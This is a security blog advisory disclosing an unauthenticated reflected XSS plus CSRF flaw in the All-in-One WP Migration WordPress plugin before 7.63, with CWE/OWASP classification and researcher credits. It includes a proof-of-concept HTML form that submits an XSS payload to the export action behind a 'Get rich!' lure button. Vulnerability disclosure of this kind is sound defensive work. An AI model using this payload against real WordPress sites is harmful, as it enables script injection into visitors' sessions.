Sep 14, 2022 | web | research




All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF


The plugin uses the wrong content type for, and does not properly escape the response from the ai1wm_export action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session.

Proof of Concept (POC)


To reproduce the flaw, we can export all the website content by the plugin and insert an invalid name in the output file name.

By validating the vulnerability, it is possible to combine the attack with a CSRF, which will force the victim's browser to send a request with the payload.



<form action="" method="POST">
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="<img src=x onclick=alert('XSS')>">

  <input type="submit" value="Get rich!">

Affected versions

All-in-One WP Migration < 7.63




Cross-Site Scripting (XSS)


Type: Cross-Site Scripting

OWASP TOP 10: A03:2021-Injection

CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')


Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).

Support us

Hacking Force is a community focused on spreading knowledge about technology and cyber security, offering a way for people to rise. We are grateful for being supported by people with the same point of view. If you indentify with it, then consider joining us.

Principal Sponsors


Blog Hacking Force © 2024